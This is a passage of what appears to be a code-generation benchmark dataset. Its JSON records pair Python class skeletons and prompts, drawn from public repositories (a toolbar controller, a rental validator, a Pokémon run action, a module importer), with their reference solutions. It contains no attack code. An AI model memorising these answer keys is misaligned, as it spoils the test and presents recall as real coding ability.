List[List[int]]\"\"\"\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[1])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, 
intervals[i][1]])\n return stack\n", "source": "the_stack_v2_python_sparse", "source_path": "56.合并区间.py", "source_repo": "yangyuxiang1996/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "cd5b0eaac77f0be9d073d598041706f6988bfe06", "bodies": ["AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\nself._toolbarAction = toolbarAction\nself.forwardAction = forwardAction\nself.forwardMenu = QtGui.QMenu(widget)\nself.forwardAction.setData(QtCore.QVariant(1))\nself.forwardAction.setMenu(self.forwardMenu)\nself.backwardAction = backwardAction\nself.backwardMenu = QtGui.QMenu(widget)\nself.backwardAction.setData(QtCore.QVariant(-1))\nself.backwardAction.setMenu(self.backwardMenu)\nself.parentDirectoryAction = parentDirectoryAction\nself.refreshAction = refreshAction\nself._delegate = _ToolbarDelegate(self)\nself.setActivated(False)", "self.widget.setEnabled(activated)\nif activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\nelse:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)", "menu.clear()\nfor steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\nif len(pathlist):\n menu.setDefaultAction(menu.actions()[0])", "def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\nreturn _jumpToPathActionSlot"], "bodies_text": "<|body_start_0|>\n AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\n self._toolbarAction = toolbarAction\n self.forwardAction = forwardAction\n self.forwardMenu = QtGui.QMenu(widget)\n self.forwardAction.setData(QtCore.QVariant(1))\n self.forwardAction.setMenu(self.forwardMenu)\n self.backwardAction = backwardAction\n self.backwardMenu = QtGui.QMenu(widget)\n self.backwardAction.setData(QtCore.QVariant(-1))\n self.backwardAction.setMenu(self.backwardMenu)\n self.parentDirectoryAction = parentDirectoryAction\n self.refreshAction = refreshAction\n self._delegate = _ToolbarDelegate(self)\n self.setActivated(False)\n<|end_body_0|>\n\n<|body_start_1|>\n self.widget.setEnabled(activated)\n if activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\n else:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)\n<|end_body_1|>\n\n<|body_start_2|>\n menu.clear()\n for steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\n if len(pathlist):\n menu.setDefaultAction(menu.actions()[0])\n<|end_body_2|>\n\n<|body_start_3|>\n def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\n return 
_jumpToPathActionSlot\n<|end_body_3|>\n", "class_docstring": "Controls the tool bar view including navigation in item history.", "class_name": "ToolbarController", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ToolbarController:\n \"\"\"Controls the tool bar view including navigation in item history.\"\"\"\n\n def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def setActivated(self, activated):\n \"\"\"Activates or deactivates of the tool bar.\"\"\"\n <|body_1|>\n\n def createHistoryMenu(self, pathlist, menu, iterator):\n \"\"\"Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\"\"\"\n <|body_2|>\n\n def _createJumpToPathActionSlot(self, action):\n \"\"\"Creates a slot which directly jumps to the associated path in the history.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\n self._toolbarAction = toolbarAction\n self.forwardAction = forwardAction\n self.forwardMenu = QtGui.QMenu(widget)\n self.forwardAction.setData(QtCore.QVariant(1))\n self.forwardAction.setMenu(self.forwardMenu)\n self.backwardAction = backwardAction\n self.backwardMenu = QtGui.QMenu(widget)\n self.backwardAction.setData(QtCore.QVariant(-1))\n self.backwardAction.setMenu(self.backwardMenu)\n self.parentDirectoryAction = parentDirectoryAction\n self.refreshAction = refreshAction\n self._delegate = _ToolbarDelegate(self)\n self.setActivated(False)\n<|end_body_0|>\n\n<|body_start_1|>\n self.widget.setEnabled(activated)\n if activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\n else:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)\n<|end_body_1|>\n\n<|body_start_2|>\n menu.clear()\n for steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\n if len(pathlist):\n menu.setDefaultAction(menu.actions()[0])\n<|end_body_2|>\n\n<|body_start_3|>\n def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\n return _jumpToPathActionSlot\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000172", "length_bytes": 7921, "license_type": "no_license", "methods": [{"docstring": "Constructor.", "name": "__init__", "signature": "def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController)"}, {"docstring": "Activates or deactivates of the tool bar.", "name": "setActivated", "signature": "def setActivated(self, activated)"}, {"docstring": "Create a menu from the given list with L{QtCore.QModelIndex} objects. 
@param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}", "name": "createHistoryMenu", "signature": "def createHistoryMenu(self, pathlist, menu, iterator)"}, {"docstring": "Creates a slot which directly jumps to the associated path in the history.", "name": "_createJumpToPathActionSlot", "signature": "def _createJumpToPathActionSlot(self, action)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006955", "prompt": "Implement the Python class `ToolbarController` described below.\n\nClass description:\nControls the tool bar view including navigation in item history.\n\nMethod signatures and docstrings:\n- def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController): Constructor.\n- def setActivated(self, activated): Activates or deactivates of the tool bar.\n- def createHistoryMenu(self, pathlist, menu, iterator): Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\n- def _createJumpToPathActionSlot(self, action): Creates a slot which directly jumps to the associated path in the history.", "prompted_full_text": "Implement the Python class `ToolbarController` described below.\n\nClass description:\nControls the tool bar view including navigation in item history.\n\nMethod signatures and docstrings:\n- def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController): Constructor.\n- def setActivated(self, activated): Activates or deactivates of the tool bar.\n- def createHistoryMenu(self, pathlist, menu, iterator): Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\n- def _createJumpToPathActionSlot(self, action): Creates a slot which directly jumps to the associated path in the history.\n\n<|skeleton|>\nclass ToolbarController:\n \"\"\"Controls the tool bar view including navigation in item history.\"\"\"\n\n def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def setActivated(self, activated):\n \"\"\"Activates or deactivates of the tool bar.\"\"\"\n <|body_1|>\n\n def createHistoryMenu(self, pathlist, menu, iterator):\n \"\"\"Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. 
@type iterator: C{int}\"\"\"\n <|body_2|>\n\n def _createJumpToPathActionSlot(self, action):\n \"\"\"Creates a slot which directly jumps to the associated path in the history.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\n self._toolbarAction = toolbarAction\n self.forwardAction = forwardAction\n self.forwardMenu = QtGui.QMenu(widget)\n self.forwardAction.setData(QtCore.QVariant(1))\n self.forwardAction.setMenu(self.forwardMenu)\n self.backwardAction = backwardAction\n self.backwardMenu = QtGui.QMenu(widget)\n self.backwardAction.setData(QtCore.QVariant(-1))\n self.backwardAction.setMenu(self.backwardMenu)\n self.parentDirectoryAction = parentDirectoryAction\n self.refreshAction = refreshAction\n self._delegate = _ToolbarDelegate(self)\n self.setActivated(False)\n<|end_body_0|>\n\n<|body_start_1|>\n self.widget.setEnabled(activated)\n if activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\n else:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)\n<|end_body_1|>\n\n<|body_start_2|>\n menu.clear()\n for steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\n if len(pathlist):\n menu.setDefaultAction(menu.actions()[0])\n<|end_body_2|>\n\n<|body_start_3|>\n def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\n return _jumpToPathActionSlot\n<|end_body_3|>\n", "revision_id": "958fda4f3064f9f6b2034da396a20ac9d9abd52f", "skeleton": "<|skeleton|>\nclass ToolbarController:\n \"\"\"Controls the tool bar view including navigation in item history.\"\"\"\n\n def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def setActivated(self, activated):\n \"\"\"Activates or deactivates of the tool bar.\"\"\"\n <|body_1|>\n\n def createHistoryMenu(self, pathlist, menu, iterator):\n \"\"\"Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. 
@type iterator: C{int}\"\"\"\n <|body_2|>\n\n def _createJumpToPathActionSlot(self, action):\n \"\"\"Creates a slot which directly jumps to the associated path in the history.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ToolbarController:\n \"\"\"Controls the tool bar view including navigation in item history.\"\"\"\n\n def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController):\n \"\"\"Constructor.\"\"\"\n AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\n self._toolbarAction = toolbarAction\n self.forwardAction = forwardAction\n self.forwardMenu = QtGui.QMenu(widget)\n self.forwardAction.setData(QtCore.QVariant(1))\n self.forwardAction.setMenu(self.forwardMenu)\n self.backwardAction = backwardAction\n self.backwardMenu = QtGui.QMenu(widget)\n self.backwardAction.setData(QtCore.QVariant(-1))\n self.backwardAction.setMenu(self.backwardMenu)\n self.parentDirectoryAction = parentDirectoryAction\n self.refreshAction = refreshAction\n self._delegate = _ToolbarDelegate(self)\n self.setActivated(False)\n\n def setActivated(self, activated):\n \"\"\"Activates or deactivates of the tool bar.\"\"\"\n self.widget.setEnabled(activated)\n if activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\n else:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)\n\n def createHistoryMenu(self, pathlist, menu, iterator):\n \"\"\"Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. 
@type iterator: C{int}\"\"\"\n menu.clear()\n for steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\n if len(pathlist):\n menu.setDefaultAction(menu.actions()[0])\n\n def _createJumpToPathActionSlot(self, action):\n \"\"\"Creates a slot which directly jumps to the associated path in the history.\"\"\"\n def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\n return _jumpToPathActionSlot\n", "source": "the_stack_v2_python_sparse", "source_path": "src/datafinder/gui/user/controller/repository/toolbar.py", "source_repo": "DLR-SC/DataFinder", "split": "test", "star_events_count": 9} {"blob_id": "92a023b85d6e7609e1d68e60476b0b0696823790", "bodies": ["if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\nelif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\nif 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')", "if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\nif 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')"], "bodies_text": "<|body_start_0|>\n if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\n elif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\n if 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')\n<|end_body_0|>\n\n<|body_start_1|>\n if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\n if 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')\n<|end_body_1|>\n", "class_docstring": "", "class_name": "RentalSchema", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RentalSchema:\n\n def assert_end_time_with_price(self, data, **kwargs):\n \"\"\"Asserts that when a rental is complete both the price and end time are included.\"\"\"\n <|body_0|>\n\n def assert_url_included_with_foreign_key(self, data, **kwargs):\n \"\"\"Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\n elif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\n if 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')\n<|end_body_0|>\n\n<|body_start_1|>\n if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\n if 'bike_id' in data and 'bike_url' not in data:\n 
raise ValidationError('Bike ID was included, but Bike URL was not.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000173", "length_bytes": 6177, "license_type": "permissive", "methods": [{"docstring": "Asserts that when a rental is complete both the price and end time are included.", "name": "assert_end_time_with_price", "signature": "def assert_end_time_with_price(self, data, **kwargs)"}, {"docstring": "Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.", "name": "assert_url_included_with_foreign_key", "signature": "def assert_url_included_with_foreign_key(self, data, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001353", "prompt": "Implement the Python class `RentalSchema` described below.\n\nClass description:\nImplement the RentalSchema class.\n\nMethod signatures and docstrings:\n- def assert_end_time_with_price(self, data, **kwargs): Asserts that when a rental is complete both the price and end time are included.\n- def assert_url_included_with_foreign_key(self, data, **kwargs): Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.", "prompted_full_text": "Implement the Python class `RentalSchema` described below.\n\nClass description:\nImplement the RentalSchema class.\n\nMethod signatures and docstrings:\n- def assert_end_time_with_price(self, data, **kwargs): Asserts that when a rental is complete both the price and end time are included.\n- def assert_url_included_with_foreign_key(self, data, **kwargs): Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\n\n<|skeleton|>\nclass RentalSchema:\n\n def assert_end_time_with_price(self, data, **kwargs):\n \"\"\"Asserts that when a rental is complete both the price and end time are included.\"\"\"\n <|body_0|>\n\n def assert_url_included_with_foreign_key(self, data, **kwargs):\n \"\"\"Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\n elif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\n if 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')\n<|end_body_0|>\n\n<|body_start_1|>\n if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\n if 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')\n<|end_body_1|>\n", "revision_id": "fc6f9230e4701cbddcb16d7257fddb9ff08bddb9", "skeleton": "<|skeleton|>\nclass RentalSchema:\n\n def assert_end_time_with_price(self, data, **kwargs):\n \"\"\"Asserts that when a rental is complete both the price and end time are included.\"\"\"\n <|body_0|>\n\n def assert_url_included_with_foreign_key(self, data, **kwargs):\n \"\"\"Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RentalSchema:\n def assert_end_time_with_price(self, data, **kwargs):\n \"\"\"Asserts that when a rental is complete both the price and end time 
are included.\"\"\"\n if 'price' in data and 'end_time' not in data:\n raise ValidationError('If the price is included, you must also include the end time.')\n elif 'price' not in data and 'end_time' in data:\n raise ValidationError('If the end time is included, you must also include the price.')\n if 'price' in data and 'estimated_price' in data:\n raise ValidationError('Rental should have one of either price or estimated_price.')\n\n def assert_url_included_with_foreign_key(self, data, **kwargs):\n \"\"\"Asserts that when a user_id or bike_id is sent that a user_url or bike_url is sent with it.\"\"\"\n if 'user_id' in data and 'user_url' not in data:\n raise ValidationError('User ID was included, but User URL was not.')\n if 'bike_id' in data and 'bike_url' not in data:\n raise ValidationError('Bike ID was included, but Bike URL was not.')\n", "source": "the_stack_v2_python_sparse", "source_path": "server/serializer/models.py", "source_repo": "dragorhast/server", "split": "test", "star_events_count": 6} {"blob_id": "833716797f678f63fa8928fcf84e27d209a85b55", "bodies": ["self._pokemon = pokemon\nself._opponent_pokemon = opponent_pokemon\nself._is_run_successful = None", "if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\nreturn self._is_run_successful"], "bodies_text": "<|body_start_0|>\n self._pokemon = pokemon\n self._opponent_pokemon = opponent_pokemon\n self._is_run_successful = None\n<|end_body_0|>\n\n<|body_start_1|>\n if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\n return self._is_run_successful\n<|end_body_1|>\n", "class_docstring": "Represents the attempt to run from a battle.", "class_name": "RunActionModel", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RunActionModel:\n \"\"\"Represents the attempt to run from a battle.\"\"\"\n\n def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None:\n \"\"\"Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\"\"\"\n <|body_0|>\n\n def is_run_successful(self) -> None:\n \"\"\"Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._pokemon = pokemon\n self._opponent_pokemon = opponent_pokemon\n self._is_run_successful = None\n<|end_body_0|>\n\n<|body_start_1|>\n if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\n return self._is_run_successful\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000174", "length_bytes": 1022, "license_type": "no_license", "methods": [{"docstring": "Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.", "name": "__init__", "signature": "def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None"}, {"docstring": "Determine whether the pokemon succeed in escaping from the battle. 
:return True if the pokemon escapes.", "name": "is_run_successful", "signature": "def is_run_successful(self) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004369", "prompt": "Implement the Python class `RunActionModel` described below.\n\nClass description:\nRepresents the attempt to run from a battle.\n\nMethod signatures and docstrings:\n- def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None: Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\n- def is_run_successful(self) -> None: Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.", "prompted_full_text": "Implement the Python class `RunActionModel` described below.\n\nClass description:\nRepresents the attempt to run from a battle.\n\nMethod signatures and docstrings:\n- def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None: Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\n- def is_run_successful(self) -> None: Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\n\n<|skeleton|>\nclass RunActionModel:\n \"\"\"Represents the attempt to run from a battle.\"\"\"\n\n def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None:\n \"\"\"Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\"\"\"\n <|body_0|>\n\n def is_run_successful(self) -> None:\n \"\"\"Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._pokemon = pokemon\n self._opponent_pokemon = opponent_pokemon\n self._is_run_successful = None\n<|end_body_0|>\n\n<|body_start_1|>\n if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\n return self._is_run_successful\n<|end_body_1|>\n", "revision_id": "dfff995e3e50a8cfa56af73d93de82c427bfa2f5", "skeleton": "<|skeleton|>\nclass RunActionModel:\n \"\"\"Represents the attempt to run from a battle.\"\"\"\n\n def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None:\n \"\"\"Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\"\"\"\n <|body_0|>\n\n def is_run_successful(self) -> None:\n \"\"\"Determine whether the pokemon succeed in escaping from the battle. :return True if the pokemon escapes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RunActionModel:\n \"\"\"Represents the attempt to run from a battle.\"\"\"\n\n def __init__(self, pokemon: PokemonModel, opponent_pokemon: PokemonModel) -> None:\n \"\"\"Create a new run action. :param pokemon: The pokemon trying to escape. :param opponent_pokemon: The other pokemon.\"\"\"\n self._pokemon = pokemon\n self._opponent_pokemon = opponent_pokemon\n self._is_run_successful = None\n\n def is_run_successful(self) -> None:\n \"\"\"Determine whether the pokemon succeed in escaping from the battle. 
:return True if the pokemon escapes.\"\"\"\n if self._is_run_successful is None:\n F = (self._pokemon.stats[StatEnum.SPEED] * 128 / self._opponent_pokemon.stats[StatEnum.SPEED] + 30) % 256\n self._is_run_successful = F > random.randint(0, 255)\n return self._is_run_successful\n", "source": "the_stack_v2_python_sparse", "source_path": "src/models/battle/run_action_model.py", "source_repo": "J-GG/Pymon", "split": "test", "star_events_count": 0} {"blob_id": "3f4019bbc16e5b60b26cf210ba42dce261acd493", "bodies": ["if fullname == 'chromite' and (not self._loading):\n return self\nreturn None", "path = os.path.dirname(os.path.realpath(__file__))\nwhile not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\nglobal CHROMITE_PATH\nCHROMITE_PATH = path + '/'\npath, mod = os.path.split(path)\nsys.path.insert(0, path)\nself._loading = True\ntry:\n return __import__(mod)\nfinally:\n sys.path.remove(path)\n self._loading = False"], "bodies_text": "<|body_start_0|>\n if fullname == 'chromite' and (not self._loading):\n return self\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n path = os.path.dirname(os.path.realpath(__file__))\n while not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\n global CHROMITE_PATH\n CHROMITE_PATH = path + '/'\n path, mod = os.path.split(path)\n sys.path.insert(0, path)\n self._loading = True\n try:\n return __import__(mod)\n finally:\n sys.path.remove(path)\n self._loading = False\n<|end_body_1|>\n", "class_docstring": "Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.", "class_name": "ChromiteImporter", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference", "LGPL-2.0-or-later", "GPL-1.0-or-later", "MIT", "Apache-2.0", "LicenseRef-scancode-public-domain"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ChromiteImporter:\n \"\"\"Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. 
Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\"\"\"\n\n def find_module(self, fullname, _path=None):\n \"\"\"Handle the 'chromite' module\"\"\"\n <|body_0|>\n\n def load_module(self, _fullname):\n \"\"\"Return our cache of the 'chromite' module\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if fullname == 'chromite' and (not self._loading):\n return self\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n path = os.path.dirname(os.path.realpath(__file__))\n while not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\n global CHROMITE_PATH\n CHROMITE_PATH = path + '/'\n path, mod = os.path.split(path)\n sys.path.insert(0, path)\n self._loading = True\n try:\n return __import__(mod)\n finally:\n sys.path.remove(path)\n self._loading = False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000175", "length_bytes": 5735, "license_type": "permissive", "methods": [{"docstring": "Handle the 'chromite' module", "name": "find_module", "signature": "def find_module(self, fullname, _path=None)"}, {"docstring": "Return our cache of the 'chromite' module", "name": "load_module", "signature": "def load_module(self, _fullname)"}], "n_methods": 2, "prompt": "Implement the Python class `ChromiteImporter` described below.\n\nClass description:\nVirtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to 